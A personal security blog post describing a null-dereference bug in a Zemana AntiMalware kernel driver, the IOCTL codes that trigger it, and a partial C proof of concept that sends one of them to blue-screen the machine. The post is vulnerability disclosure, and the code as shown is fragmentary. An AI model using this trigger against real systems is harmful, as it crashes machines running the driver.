So found a bug in Zemana AntiMalware version 188.8.131.52! It was kinda cool because this is my first time finding a bug in software that doesn’t have any type of exploits…that I saw at the time. The bug is a Null Dereference and wasn’t called in any way; so unfortunately no privesc was able to happen, blehhh. I wish though! It affects Windows 7 and up, both 32 and 64 bit systems.
To trigger this, the ioctl codes of 0x80002010 or 0x80002054 need to get sent.
When you allocate a page using 0x80002010 , nothing amazing will happen. It will just error out. When you allocate a page using 0x80002054, you can allocate your own null page!
Unfortunately, our allocated page doesn’t get called upon so nothing will happen. 0x11e gets put into ESI which overwrites where our page lies. Freaking A. I tried to see if I can get code exec anyways knowing full well I will not be fruitful…for science, but failed anyways. Eh, oh well!
Sent an email out to the CVE peeps and the vendor and found out a pimp named Parvez Anwar beat me to the bug! Nicely done! Weird thing was that it wasn’t for Zemana. It was for Watchdog Anti-malware. The interesting thing about this is Watchdog Anti-malware also uses the same drivers as Zemana. Same looking GUI, same drivers, same IOCTL codes, and same BSoD’s. Interestiiiing…anyways! There is no print statements in my PoC because nothing will really gets printed when a blue screen is triggered. Here is a PoC to blue screen the machine:
#define Driver_Name L"\\\\.\\ZemanaAntiMalware"
#define Ioctl_Code 0x80002054
// Grab handle to driver
HANDLE Driver = CreateFile(
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
if (Driver == INVALID_HANDLE_VALUE)
// Send the IOCTL. Watch the machine go poof!
LPVOID lpInBuffer = 0;
BOOL didItWork = DeviceIoControl(